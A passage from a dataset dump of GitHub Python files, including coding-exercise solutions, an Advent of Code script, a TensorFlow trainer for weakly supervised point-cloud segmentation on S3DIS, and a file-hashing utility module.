sort_list_y[index_y] > rect_right[right_rect][0][1]:\n if sort_list_y[index_y] <= rect_right[right_rect][1][1]:\n if x == rect_right[right_rect][1][0]:\n condition[0] -= 1\n if condition[0] < 1:\n y_perimeter = y_perimeter + (sort_list_y[index_y] - sort_list_y[index_y - 1])\nprint(y_perimeter)\nfor index_x in range(1, len(sort_list_x)):\n for y in sort_list_y:\n for bottom_points, top_points in zip(rect_bottom.values(), rect_top.values()):\n if sort_list_x[index_x] > bottom_points[0][0]:\n if sort_list_x[index_x] <= bottom_points[1][0]:\n if y == bottom_points[1][1]:\n if condition[1] < 1:\n x_perimeter = x_perimeter + (sort_list_x[index_x] - sort_list_x[index_x - 1])\n condition[1] = condition[1] + 1\n if sort_list_x[index_x] > top_points[0][0]:\n if sort_list_x[index_x] <= top_points[1][0]:\n if y == top_points[1][1]:\n condition[1] = condition[1] - 1\n if condition[1] < 1:\n x_perimeter = x_perimeter + (sort_list_x[index_x] - sort_list_x[index_x - 1])\nprint(x_perimeter)\nprint('The perimeter is:', x_perimeter + y_perimeter)\n\n\n\n","repo_name":"junbaic/COMP9021","sub_path":"Assignment/assignment1/perimeter.py","file_name":"perimeter.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10511725380","text":"# Given an array nums, write a function to move all 0's to the end of it while maintaining the relative order of the non-zero elements.\n\n# Example:\n\n# Input: [0,1,0,3,12]\n# Output: [1,3,12,0,0]\n# Note:\n\n# You must do this in-place without making a copy of the array.\n# Minimize the total number of operations.\n\n# Just like bubble sort, instead of greater than or less than numbers. Its numbers that are 0 or not 0.\ndef moveZeroes(self, nums: List[int]) -> None:\n zero = 0\n for non_zero in range(len(nums)):\n if nums[non_zero] == 0:\n continue\n \n nums[zero], nums[non_zero] = nums[non_zero], nums[zero]\n\n zero += 1\n\n# Time: O(n) | Space: O(1)\n\n# left = 0\n# right = left + 1\n\n# while right < len(nums) - 1:\n# if nums[left] == 0 and nums[right] == 0:\n# right += 1\n \n# if nums[left] == 0:\n# print('yes')\n# if nums[right] != 0:\n# self.swap(nums, left, right)\n# else:\n# right += 1\n# else:\n# left += 1\n# return nums\n \n# def swap(self, nums, left, right):\n# nums[left], nums[right] = nums[right], nums[left]","repo_name":"chris510/Coding-Problems","sub_path":"python/array/283_movezeroes.py","file_name":"283_movezeroes.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73709800852","text":"#!/usr/bin/env python3\n\n# from pprint import pprint\nimport re\n\nfrom falala import tada\n\nwith open(\"input\", \"r\") as f:\n input = f.read().splitlines()\n\nbag_rules = dict()\n\nfor i in input:\n simplified = (\n i.replace(\" contain\", \",\")\n .replace(\" bags.\", \"\")\n .replace(\" bag.\", \"\")\n .replace(\" bags\", \"\")\n .replace(\" bag\", \"\")\n .replace(\" no other\", \"\")\n )\n simplified = simplified.split(\",\")\n\n holder, *holdees = simplified\n\n holdee_tuples = []\n for h in holdees:\n if h is not \"\":\n h = h.lstrip().split(\" \")\n quantity = int(h[0])\n which_type = \"_\".join(h[1:])\n parsed = (quantity, which_type)\n holdee_tuples.append(parsed)\n\n holder = holder.replace(\" \", \"_\")\n bag_rules[holder] = holdee_tuples\n\n# ok, finally we have the rules, this time with counts\n\n# just curious\n# terminal_bags = [ k for k,v in bag_rules.items() if v == []]\n# print(\"Bags of no holding:\")\n# pprint(terminal_bags)\n\nrunning_tally = 0\n\n\ndef tally_bags_within(bag):\n global running_tally\n rule = bag_rules[bag]\n\n # create list of next-level bags to check\n inner_bags = []\n for r in rule:\n running_tally += r[0]\n inner_bags.extend([r[1]] * r[0])\n\n # keep checking those bags - pun intended.\n for b in inner_bags:\n tally_bags_within(b)\n\n\n# do the thing\ntally_bags_within(\"shiny_gold\")\n\ntada(f\"Wow: a single shiny gold bag holds {running_tally} inner bags. 😜\")\n","repo_name":"knoxilla/advent-of-code","sub_path":"2020/7/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20876924841","text":"'''\nN과 M (2)\nhttps://www.acmicpc.net/problem/15650\n백준 실버3 15650\n\n자연수 N과 M이 주어졌을 때, 아래 조건을 만족하는 길이가 M인 수열을 모두 구하는 프로그램을 작성하시오.\n\n1부터 N까지 자연수 중에서 중복 없이 M개를 고른 수열\n고른 수열은 오름차순이어야 한다.\n'''\n\n\nN, M = map(int, input().split())\narr = [0]*M\n\ndef f(i, M):\n if i == M:\n print(*arr)\n return\n for m in range(1, N+1):\n if m not in arr and (i == 0 or arr[i-1] < m):\n arr[i] = m\n f(i+1, M)\n arr[i] = 0\nf(0, M)","repo_name":"seoda0000/TIL","sub_path":"AlgorithmProblemSolving/04_백준/Silver/15650_N과_M_2.py","file_name":"15650_N과_M_2.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"13392790840","text":"######### Utility functions for S3DIS dataset\nimport numpy as np\nimport tensorflow as tf\nimport os\nimport sys\nimport scipy.io as scio\nimport pathlib\n\n# sys.path.append(os.path.join(pathlib.Path(__file__).parent.absolute(),'../Util'))\n\nimport Tool\nimport DGCNN_S3DIS as network\nimport SmoothConstraint\nimport ProbLabelPropagation as PLP\n\n\nclass S3DIS_Trainer():\n\n def __init__(self, test_area):\n\n self.bestValCorrect = 0. # initial best validation performance\n\n pass\n\n def SetLearningRate(self, LearningRate, BatchSize):\n\n self.BASE_LEARNING_RATE = LearningRate\n self.BATCH_SIZE = BatchSize\n self.BN_INIT_DECAY = 0.5\n self.BN_DECAY_DECAY_RATE = 0.5\n self.DECAY_STEP = 300000\n self.DECAY_RATE = 0.5\n self.BN_DECAY_DECAY_STEP = float(self.DECAY_STEP * 2)\n self.BN_DECAY_CLIP = 0.99\n\n def get_learning_rate(self):\n learning_rate = tf.train.exponential_decay(\n self.BASE_LEARNING_RATE, # Base learning rate.\n self.batch * self.BATCH_SIZE, # Current index into the dataset.\n self.DECAY_STEP, # Decay step.\n self.DECAY_RATE, # Decay rate.\n staircase=True)\n learning_rate = tf.maximum(learning_rate, 1e-5) # CLIP THE LEARNING RATE!!\n return learning_rate\n\n def get_bn_decay(self):\n bn_momentum = tf.train.exponential_decay(\n self.BN_INIT_DECAY,\n self.batch * self.BATCH_SIZE,\n self.BN_DECAY_DECAY_STEP,\n self.BN_DECAY_DECAY_RATE,\n staircase=True)\n bn_decay = tf.minimum(self.BN_DECAY_CLIP, 1 - bn_momentum)\n return bn_decay\n\n def defineNetwork(self, batch_size, num_points, style='Full', rampup=101):\n '''\n define DGCNN network for incomplete labels as supervision\n Args:\n batch_size: batchsize for training network\n num_points: number of points for each point cloud sample\n style: model style, use full model or plain model\n rampup: rampup epoch for training\n :return:\n '''\n\n ##### Parameters\n self.rampup = rampup\n self.style = style\n\n ##### Define Network Inputs\n self.X_ph = tf.placeholder(dtype=tf.float32, shape=[batch_size, num_points, 9], name='InputPts') # B*N*3\n self.Y_ph = tf.placeholder(dtype=tf.float32, shape=[batch_size, num_points, 13], name='PartGT') # B*N*13\n self.Mask_ph = tf.placeholder(dtype=tf.float32, shape=[batch_size, num_points], name='Mask') # B*N\n self.Is_Training_ph = tf.placeholder(dtype=tf.bool, shape=(), name='IsTraining')\n\n ## Set up batch norm decay and learning rate decay\n self.batch = tf.Variable(0, trainable=False)\n bn_decay = self.get_bn_decay()\n learning_rate = self.get_learning_rate()\n\n ##### Define DGCNN network\n self.Z = network.get_model(self.X_ph, self.Is_Training_ph, weight_decay=0., bn_decay=bn_decay)\n\n self.Z_exp = tf.exp(self.Z)\n self.Z_prob = tf.nn.softmax(self.Z, axis=-1)\n\n ## Segmentation Branch\n loss_seg = tf.nn.softmax_cross_entropy_with_logits(labels=self.Y_ph, logits=self.Z) # B*N\n self.loss_seg = tf.reduce_sum(self.Mask_ph * loss_seg) / tf.reduce_sum(self.Mask_ph)\n\n ## Final Loss\n self.epoch = 0\n if style == 'Plain':\n # plain style training - only the labeled points are used for supervision\n self.loss = self.loss_seg\n elif style == 'Full':\n # full style training - all weakly supervised losses are used for training\n self.WeakSupLoss()\n self.loss = self.loss_seg + \\\n tf.cast(tf.greater_equal(self.epoch, self.rampup), dtype=tf.float32) * (\n self.loss_siamese + self.loss_inexact + self.loss_smooth)\n else:\n sys.exit('Loss {} is not defined!'.format(self.loss))\n\n ## Final Loss\n # self.loss = self.loss_seg + self.loss_siamese + self.loss_inexact + self.loss_smooth\n\n ##### Define Optimizer\n self.solver = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.loss,\n global_step=self.batch) # initialize solver\n self.saver = tf.train.Saver(max_to_keep=2)\n config = tf.ConfigProto(allow_soft_placement=False)\n config.gpu_options.allow_growth = bool(True) # Use how much GPU memory\n self.sess = tf.Session(config=config)\n self.sess.run(tf.global_variables_initializer())\n\n return True\n\n def WeakSupLoss(self):\n '''\n Define additional losses for weakly supervised segmentation\n Returns:\n\n '''\n\n ## Siamese Branch\n self.loss_siamese = 1e1 * tf.reduce_mean(tf.reduce_sum((self.Z_prob[0::2] - self.Z_prob[1::2]) ** 2, axis=-1))\n\n ## MIL Branch\n L_gt = tf.cast(tf.reduce_max(self.Y_ph, axis=1), tf.float32) # inexact labels B*13\n self.L = tf.reduce_max(self.Z, axis=1)\n loss_ineaxct = tf.nn.sigmoid_cross_entropy_with_logits(labels=L_gt, logits=self.L) # B*K\n self.loss_inexact = tf.reduce_mean(loss_ineaxct)\n\n ## Smooth Branch\n self.loss_smooth = SmoothConstraint.Loss_SpatialColorSmooth_add_SelfContain(self.Z_prob, self.X_ph[:, :, 0:6])\n\n def defLabelPropSolver(self,alpha=1e0,beta=1e0,K=10):\n ##### Define Label Propagation Solver\n self.LPSolver = PLP.LabelPropagation_TF(alpha=1e0, beta=1e0, K=10)\n self.TFComp = {}\n self.TFComp['Lmat'] = Tool.TF_Computation.LaplacianMatSym_XYZRGB_DirectComp()\n\n ##### Define Training and Evaluation functions\n def TrainOneEpoch(self, Loader, pts_idx_list=None, batch_size=12):\n '''\n Function to train one epoch\n :param Loader: Object to load training data\n :param samp_idx_list: A list indicating the labelled points B*N\n :return:\n '''\n batch_cnt = 1\n data_cnt = 0\n # shape_cnt = np.zeros(shape=[len(Loader.objcats)])\n avg_loss = 0.\n avg_acc = 0.\n\n while True:\n\n #### get next batch\n SuccessFlag, data, seg, weak_seg_onehot, mb_size, data_idx = Loader.NextBatch_TrainSet_v1()\n\n if not SuccessFlag:\n break\n\n if mb_size < batch_size:\n break\n\n #### Prepare Incomplete Labelled Training Data\n if pts_idx_list is None:\n Mask_bin = np.zeros(shape=[mb_size, data.shape[1]], dtype=np.float32) # B*N\n else:\n Mask_bin = np.zeros(shape=[mb_size, data.shape[1]], dtype=np.float32) # B*N\n for b_i in range(mb_size):\n batch_samp_idx = data_idx[b_i]\n Mask_bin[b_i, pts_idx_list[batch_samp_idx]] = 1\n Mask_bin_feed = Mask_bin\n\n #### Create Siamese Input\n data_feed = data\n\n #### Prepare Labels\n seg_onehot_feed = Tool.OnehotEncode(seg, 13)\n\n #### Train One Iteration\n _, loss_mb, Z_prob_mb = \\\n self.sess.run(\n [self.solver, self.loss, self.Z_prob],\n feed_dict={self.X_ph: data_feed,\n self.Y_ph: seg_onehot_feed,\n self.Is_Training_ph: True,\n self.Mask_ph: Mask_bin_feed})\n\n ## Calculate loss and correct rate\n avg_loss = (avg_loss * data_cnt + loss_mb * mb_size) / (data_cnt + mb_size)\n pred = []\n for b_i in range(mb_size):\n pred.append(np.argmax(Z_prob_mb[b_i], axis=-1))\n pred = np.stack(pred)\n avg_acc = (avg_acc * data_cnt + np.mean(pred == seg) * mb_size) / (data_cnt + mb_size)\n\n data_cnt += mb_size\n\n print(\n '\\rBatch {:d} TrainedSamp {:d} mbLoss {:.4f} '\n 'Avg Acc {:.2f}%'.format(\n batch_cnt, data_cnt, loss_mb, 100 * avg_acc),\n end='')\n\n batch_cnt += 1\n\n Loader.ResetLoader_TrainSet()\n\n # increase epoch counter by 1\n self.epoch += 1\n\n # return avg_loss, perdata_miou, pershape_miou\n return avg_loss, avg_acc\n\n def TrainOneEpoch_Full(self, Loader, pts_idx_list=None, batch_size=12):\n '''\n Function to train one epoch\n :param Loader: Object to load training data\n :param samp_idx_list: A list indicating the labelled points B*N\n :return:\n '''\n batch_cnt = 1\n data_cnt = 0\n # shape_cnt = np.zeros(shape=[len(Loader.objcats)])\n avg_loss = 0.\n avg_acc = 0.\n\n while True:\n\n #### get next batch\n SuccessFlag, data, seg, weak_seg_onehot, mb_size, data_idx = Loader.NextBatch_TrainSet_v1()\n\n if not SuccessFlag or batch_cnt > np.inf:\n break\n\n if mb_size < batch_size:\n break\n\n #### Prepare Incomplete Labelled Training Data\n if pts_idx_list is None:\n Mask_bin = np.zeros(shape=[mb_size, data.shape[1]], dtype=np.float32) # B*N\n else:\n Mask_bin = np.zeros(shape=[mb_size, data.shape[1]], dtype=np.float32) # B*N\n for b_i in range(mb_size):\n batch_samp_idx = data_idx[b_i]\n Mask_bin[b_i, pts_idx_list[batch_samp_idx]] = 1\n\n Mask_bin_feed = []\n for mask_i in Mask_bin:\n Mask_bin_feed.append(mask_i)\n Mask_bin_feed.append(mask_i)\n Mask_bin_feed = np.stack(Mask_bin_feed)\n\n #### Create Siamese Input\n if self.epoch >= self.rampup:\n data_feed = []\n for data_i in data:\n data_feed.append(data_i)\n aug_choice = np.random.choice([0, 1, 2, 3, 4, 5, 6, 7], 1)\n if aug_choice == 1:\n data_i[:, 0], data_i[:, 1] = data_i[:, 1].copy(), data_i[:, 0].copy()\n data_i[:, 6], data_i[:, 7] = data_i[:, 7].copy(), data_i[:, 6].copy()\n elif aug_choice == 2:\n data_i[:, 0] = -data_i[:, 0]\n data_i[:, 6] = -data_i[:, 6] + 1\n elif aug_choice == 3:\n data_i[:, 1] = -data_i[:, 1]\n data_i[:, 7] = -data_i[:, 7] + 1\n elif aug_choice == 4:\n data_i[:, 0] = -data_i[:, 0]\n data_i[:, 6] = -data_i[:, 6] + 1\n data_i[:, 1] = -data_i[:, 1]\n data_i[:, 7] = -data_i[:, 7] + 1\n elif aug_choice == 5:\n data_i[:, 0], data_i[:, 1] = data_i[:, 1].copy(), data_i[:, 0].copy()\n data_i[:, 6], data_i[:, 7] = data_i[:, 7].copy(), data_i[:, 6].copy()\n data_i[:, 0] = -data_i[:, 0]\n data_i[:, 6] = -data_i[:, 6] + 1\n elif aug_choice == 6:\n data_i[:, 0], data_i[:, 1] = data_i[:, 1].copy(), data_i[:, 0].copy()\n data_i[:, 6], data_i[:, 7] = data_i[:, 7].copy(), data_i[:, 6].copy()\n data_i[:, 1] = -data_i[:, 1]\n data_i[:, 7] = -data_i[:, 7] + 1\n elif aug_choice == 7:\n data_i[:, 0], data_i[:, 1] = data_i[:, 1].copy(), data_i[:, 0].copy()\n data_i[:, 6], data_i[:, 7] = data_i[:, 7].copy(), data_i[:, 6].copy()\n data_i[:, 0] = -data_i[:, 0]\n data_i[:, 6] = -data_i[:, 6] + 1\n data_i[:, 1] = -data_i[:, 1]\n data_i[:, 7] = -data_i[:, 7] + 1\n\n data_feed.append(data_i)\n\n data_feed = np.stack(data_feed, axis=0)\n else:\n data_feed = []\n for data_i in data:\n data_feed.append(data_i)\n data_feed.append(data_i)\n data_feed = np.stack(data_feed)\n\n ## Prepare Labels\n seg_onehot = Tool.OnehotEncode(seg, 13)\n seg_feed_onehot = []\n for seg_i in seg_onehot:\n seg_feed_onehot.append(seg_i)\n seg_feed_onehot.append(seg_i)\n seg_feed_onehot = np.stack(seg_feed_onehot)\n\n #### Train One Iteration\n _, loss_mb, loss_siamese_mb, loss_mil_mb, loss_smooth_mb, Z_prob_mb = \\\n self.sess.run(\n [self.solver, self.loss, self.loss_siamese, self.loss_inexact, self.loss_smooth, self.Z_prob],\n feed_dict={self.X_ph: data_feed,\n self.Y_ph: seg_feed_onehot,\n self.Is_Training_ph: True,\n self.Mask_ph: Mask_bin_feed})\n\n ## Calculate loss and correct rate\n avg_loss = (avg_loss * data_cnt + loss_mb * mb_size) / (data_cnt + mb_size)\n pred = []\n for b_i in range(mb_size):\n pred.append(np.argmax(Z_prob_mb[2 * b_i], axis=-1))\n pred = np.stack(pred)\n avg_acc = (avg_acc * data_cnt + np.mean(pred == seg) * mb_size) / (data_cnt + mb_size)\n\n data_cnt += mb_size\n\n print(\n '\\rBatch {:d} TrainedSamp {:d} mbLoss {:.4f} SiamLoss {:.3f} MILLoss {:.3f} SmoothLoss {:.3f} '\n 'Avg Acc {:.2f}%'.format(\n batch_cnt, data_cnt, loss_mb, loss_siamese_mb, loss_mil_mb, loss_smooth_mb, 100 * avg_acc),\n end='')\n\n batch_cnt += 1\n\n Loader.ResetLoader_TrainSet()\n\n # increase epoch counter by 1\n self.epoch += 1\n\n # return avg_loss, perdata_miou, pershape_miou\n return avg_loss, avg_acc\n\n def EvalOneEpoch(self, Loader):\n batch_cnt = 1\n samp_cnt = 0\n avg_loss = 0.\n avg_correct_rate = 0.\n avg_iou = 0.\n while True:\n\n ## get next batch\n SuccessFlag, data, seg, weak_seg_onehot, mb_size = Loader.NextBatch_TestSet()\n\n if not SuccessFlag:\n break\n\n ## Normalize Validation Points\n # data = PointNet_CAM.pc_max_normalize(data)\n\n ## Dummy Variables\n Mask_bin = np.ones(shape=[mb_size, data.shape[1]], dtype=np.float32)\n\n loss_mb, Z_prob_mb = \\\n self.sess.run([self.loss, self.Z_prob],\n feed_dict={self.X_ph: data,\n self.Y_ph: seg,\n self.Is_Training_ph: True,\n self.Mask_ph: Mask_bin})\n\n ## Calculate loss and correct rate\n pred_mb = np.argmax(Z_prob_mb, axis=-1)\n correct = np.mean(pred_mb == seg)\n m_iou = np.mean(Tool.IoU(pred_mb, seg, Loader.numParts))\n\n # avg_loss = (batch_cnt - 1) / batch_cnt * avg_loss + (loss_mb / mb_size) / batch_cnt\n # avg_correct_rate = (batch_cnt - 1) / batch_cnt * avg_correct_rate + correct / batch_cnt\n\n avg_loss = (avg_loss * samp_cnt + loss_mb) / (samp_cnt + mb_size)\n avg_correct_rate = (avg_correct_rate * samp_cnt + correct * mb_size) / (samp_cnt + mb_size)\n avg_iou = (avg_iou * samp_cnt + m_iou * mb_size) / (samp_cnt + mb_size)\n\n samp_cnt += mb_size\n\n print('\\rBatch {:d} EvaluatedSamp {:d} Avg Loss {:.4f} Avg Correct Rate {:.3f}% Avg IoU {:.3f}%'.format(\n batch_cnt, samp_cnt, avg_loss, 100 * avg_correct_rate, 100 * avg_iou), end='')\n\n batch_cnt += 1\n\n Loader.ResetLoader_TestSet()\n\n return avg_loss, avg_correct_rate, avg_iou\n\n def EvalOneEpoch_Full(self, Loader):\n '''\n Evaluate the full model for one epoch\n Args:\n Loader: Data loader object\n\n Returns:\n\n '''\n batch_cnt = 1\n samp_cnt = 0\n true_positive_classes = np.zeros(shape=[13])\n positive_classes = np.zeros(shape=[13])\n gt_classes = np.zeros(shape=[13])\n total_correct = 0.\n total_seen = 0.\n avg_loss = 0.\n avg_correct_rate = 0.\n iou = 0.\n\n while True:\n\n ## get next batch\n SuccessFlag, data, seg_mb, weak_seg_onehot, mb_size = Loader.NextBatch_TestSet()\n\n if not SuccessFlag:\n break\n\n if mb_size < Loader.batchsize:\n data_feed = np.concatenate([data, np.tile(data[np.newaxis, 0, ...], [Loader.batchsize - mb_size, 1, 1])],\n axis=0)\n seg_feed = np.concatenate([seg_mb, np.tile(seg_mb[np.newaxis, 0], [Loader.batchsize - mb_size, 1])], axis=0)\n seg_Onehot_feed = Tool.OnehotEncode(seg_feed, 13)\n else:\n data_feed = data\n seg_Onehot_feed = Tool.OnehotEncode(seg_mb, 13)\n\n Mask_bin_feed = np.ones(shape=[Loader.batchsize, data.shape[1]], dtype=np.float32)\n\n ## Replicate for Siamese Network Input\n data_feed_rep = []\n seg_Onehot_feed_rep = []\n Mask_bin_feed_rep = []\n\n for b_i in range(self.BATCH_SIZE):\n data_feed_rep.append(data_feed[b_i])\n data_feed_rep.append(data_feed[b_i])\n seg_Onehot_feed_rep.append(seg_Onehot_feed[b_i])\n seg_Onehot_feed_rep.append(seg_Onehot_feed[b_i])\n Mask_bin_feed_rep.append(Mask_bin_feed[b_i])\n Mask_bin_feed_rep.append(Mask_bin_feed[b_i])\n\n data_feed_rep = np.stack(data_feed_rep, axis=0)\n seg_Onehot_feed_rep = np.stack(seg_Onehot_feed_rep, axis=0)\n Mask_bin_feed_rep = np.stack(Mask_bin_feed_rep, axis=0)\n\n loss_mb, Z_prob_mb = \\\n self.sess.run([self.loss, self.Z_prob],\n feed_dict={self.X_ph: data_feed_rep,\n self.Y_ph: seg_Onehot_feed_rep,\n self.Is_Training_ph: False,\n self.Mask_ph: Mask_bin_feed_rep})\n\n Z_prob_mb = Z_prob_mb[0:2 * mb_size:2, ...]\n\n ## Calculate loss and correct rate\n pred_mb = np.argmax(Z_prob_mb, axis=-1)\n correct = np.sum(pred_mb == seg_mb)\n acc = np.mean(pred_mb == seg_mb)\n # m_iou = np.mean(Tool.IoU(pred_mb, seg, Loader.numParts))\n total_correct += correct\n total_seen += (mb_size * Loader.NUM_POINT)\n for pred, label in zip(pred_mb,seg_mb):\n for pt_i in range(Loader.NUM_POINT):\n positive_classes[pred[pt_i]] += 1\n true_positive_classes[label[pt_i]] += float(pred[pt_i] == label[pt_i])\n gt_classes[label[pt_i]] += 1\n\n ## Calculate IoU\n iou = true_positive_classes / (\n gt_classes + positive_classes - true_positive_classes + 1e-5)\n\n avg_loss = (avg_loss * samp_cnt + loss_mb) / (samp_cnt + mb_size)\n avg_correct_rate = (avg_correct_rate * samp_cnt + acc * mb_size) / (samp_cnt + mb_size)\n # avg_iou = (avg_iou * samp_cnt + m_iou * mb_size) / (samp_cnt + mb_size)\n\n samp_cnt += mb_size\n\n print('\\rBatch {:d} EvaluatedSamp {:d} Avg Loss {:.4f} Avg Correct Rate {:.3f}% mIoU {:.3f}%'.format(\n batch_cnt, samp_cnt, avg_loss, 100 * avg_correct_rate, 100 * np.mean(iou)), end='')\n\n batch_cnt += 1\n\n Loader.ResetLoader_TestSet()\n\n\n return avg_loss, avg_correct_rate, np.mean(iou)\n\n def Test(self, Loader, PRED_PATH):\n '''\n Inference on test set\n Args:\n Loader: Data loader object\n PRED_PATH: the path to save inference results\n\n Returns:\n\n '''\n true_positive_classes = np.zeros(shape=[13])\n positive_classes = np.zeros(shape=[13])\n gt_classes = np.zeros(shape=[13])\n total_correct = 0.\n total_seen = 0.\n avg_loss = 0.\n samp_cnt = 0\n room_cnt = 0\n\n while True:\n\n ## Evaluate Each Room\n data, label, room_path = Loader.LoadNextTestRoomData_v1()\n\n if data is None:\n break\n\n ## Do inference block by block\n allPred = []\n allGT = []\n\n for blk_i, data_i, label_i in zip(range(data.shape[0]), data, label):\n\n ## Inference One Block\n feed_dict = {self.X_ph: data_i[np.newaxis, ...],\n self.Y_ph: Tool.OnehotEncode(label_i[np.newaxis, ...], 13),\n self.Mask_ph: np.ones([1, data_i.shape[0]]),\n self.Is_Training_ph: False}\n\n loss_mb, Z_prob_mb = \\\n self.sess.run([self.loss, self.Z_prob],\n feed_dict=feed_dict)\n\n ## Apply Label Propagation\n Lmat = self.TFComp['Lmat'].Eval(self.sess, data_i[np.newaxis, :, 0:3], data_i[np.newaxis, :, 3:6])\n _, Z_prob_LP, w = self.LPSolver.SolveLabelProp(self.sess, Lmat[0], Z_prob_mb[0])\n\n ## Evaluate Performance\n avg_loss = (avg_loss * blk_i + loss_mb * 1) / (blk_i + 1)\n pred = np.argmax(Z_prob_LP, axis=-1)\n correct = np.sum(pred == label_i)\n total_correct += correct\n total_seen += (1 * Loader.NUM_POINT)\n for pt_i in range(Loader.NUM_POINT):\n positive_classes[pred[pt_i]] += 1\n true_positive_classes[label_i[pt_i]] += float(pred[pt_i] == label_i[pt_i])\n gt_classes[label_i[pt_i]] += 1\n\n samp_cnt += 1\n\n ## Accuracy\n acc = total_correct / total_seen\n\n ## Calculate IoU\n iou = true_positive_classes / (\n gt_classes + positive_classes - true_positive_classes + 1e-5)\n\n ## Append predictions\n allPred.append(pred)\n allGT.append(label_i)\n\n print('\\rroom {:d} acc {:.2f}% iou: {:.2f}%'.format(room_cnt, 100 * acc, 100 * np.mean(iou)), end='')\n\n #### Save Predictions for Current Room\n allPred = np.concatenate(allPred, axis=0)\n allGT = np.concatenate(allGT, axis=0)\n\n room_name = room_path.split('/')[-1].split('.')[0]\n\n room_pred_filepath = os.path.join(PRED_PATH, '{}_pred_gt.mat'.format(room_name))\n\n scio.savemat(room_pred_filepath, {'data': data, 'pred': allPred, 'gt': allGT})\n\n room_cnt += 1\n\n return true_positive_classes, positive_classes, gt_classes\n\n def SaveCheckPoint(self, save_filepath, best_filename, eval_avg_correct_rate):\n\n save_filepath = os.path.abspath(save_filepath)\n\n self.saver.save(self.sess, save_filepath)\n\n filename = save_filepath.split('/')[-1]\n path = os.path.join(*save_filepath.split('/')[0:-1])\n path = '/' + path\n\n ## Save a copy of best performing model on validation set\n if self.bestValCorrect < np.mean(eval_avg_correct_rate):\n self.bestValCorrect = np.mean(eval_avg_correct_rate)\n\n src_filepath = os.path.join(path,\n '{}.data-00000-of-00001'.format(\n filename))\n # trg_filepath = os.path.join(CHECKPOINT_PATH,'Checkpoint_CAM_L2Reg_PartDropout_bestOnValid_epoch-{:d}.data-00000-of-00001'.format(epoch))\n trg_filepath = os.path.join(path,\n '{}.data-00000-of-00001'.format(\n best_filename))\n command = 'cp {:s} {:s}'.format(src_filepath, trg_filepath)\n os.system(command)\n\n src_filepath = os.path.join(path,\n '{}.index'.format(filename))\n # trg_filepath = os.path.join(CHECKPOINT_PATH,'Checkpoint_CAM_L2Reg_PartDropout_bestOnValid_epoch-{:d}.index'.format(epoch))\n trg_filepath = os.path.join(path,\n '{}.index'.format(best_filename))\n command = 'cp {:s} {:s}'.format(src_filepath, trg_filepath)\n os.system(command)\n\n src_filepath = os.path.join(path,\n '{}.meta'.format(filename))\n # trg_filepath = os.path.join(CHECKPOINT_PATH,'Checkpoint_CAM_L2Reg_PartDropout_bestOnValid_epoch-{:d}.meta'.format(epoch))\n trg_filepath = os.path.join(path,\n '{}.meta'.format(best_filename))\n command = 'cp {:s} {:s}'.format(src_filepath, trg_filepath)\n os.system(command)\n\n ########## Restore Checkpoint function\n def RestoreCheckPoint(self, filepath):\n\n self.saver.restore(self.sess, filepath)","repo_name":"alex-xun-xu/WeakSupPointCloudSeg","sub_path":"S3DIS/S3DIS_DGCNN_trainer.py","file_name":"S3DIS_DGCNN_trainer.py","file_ext":"py","file_size_in_byte":25286,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"67"} +{"seq_id":"19502708818","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function, unicode_literals\nimport os\nimport magic\nimport json\nimport hashlib\nimport uuid\n\n\"\"\"Utils module\"\"\"\n\n\nclass utils:\n \"\"\"\n Regroupment of useful functions\n All methods are static\n \"\"\"\n\n @staticmethod\n def check_mime_type(filename, mime_type_allowed):\n \"\"\"\n Check if the mime type of the file is in the allowed type\n Return bool valid\n \"\"\"\n if not isinstance(mime_type_allowed, (list, tuple)):\n raise TypeError('\"mime_type_allowed\" is not a list or a tuple')\n mime_type = magic.from_file(filename, mime=True)\n if(mime_type in mime_type_allowed):\n return True\n return False\n\n @staticmethod\n def generate_uuid():\n \"\"\"\n Get a unique id\n Return uuid unique id\n \"\"\"\n return uuid.uuid4()\n\n @staticmethod\n def file_hash(algo, filename):\n \"\"\"\n Hash a file with given algorithm\n [sha256, md5]\n Return string hash\n \"\"\"\n if(algo == 'sha256'):\n return utils.file_hash_sha256(filename)\n elif(algo == 'md5'):\n return utils.file_hash_md5(filename)\n\n raise ValueError('Algorithm {} not implemented.'.format(algo))\n\n @staticmethod\n def file_hash_sha256(filename):\n \"\"\"\n Get the file SHA256\n Return string hash\n \"\"\"\n h = hashlib.sha256()\n with open(filename, 'rb', buffering=0) as f:\n for b in iter(lambda: f.read(128*1024), b''):\n h.update(b)\n return h.hexdigest()\n\n @staticmethod\n def file_hash_md5(filename):\n \"\"\"\n Get the file MD5\n Return string hash\n \"\"\"\n hash_md5 = hashlib.md5()\n with open(filename, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n\n @staticmethod\n def file_get_contents(filename, mode='r'):\n \"\"\"\n Get the content of a file\n Return string content\n \"\"\"\n content = ''\n if os.path.exists(filename):\n fp = open(filename, mode)\n content = fp.read()\n fp.close()\n return content\n\n @staticmethod\n def file_put_contents(filename, contents):\n \"\"\"\n Write content to a file\n \"\"\"\n file = open(filename, 'w')\n file.write(contents)\n file.close()\n\n @staticmethod\n def file_get_json(filename):\n \"\"\"\n Load a json object from file\n Return collection json\n \"\"\"\n if os.path.exists(filename):\n if(utils.check_mime_type(filename, ['application/json', 'text/plain'])):\n content = utils.file_get_contents(filename)\n return json.loads(content)\n else:\n raise ValueError(\n '{} is not a valid json file.'.format(filename))\n","repo_name":"Cyberprotect/Ceres-Packet-Exploder","sub_path":"cerespacketexploder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"37841789129","text":"# -*- coding: utf-8 -*-\n\nimport serial\nimport time\nimport 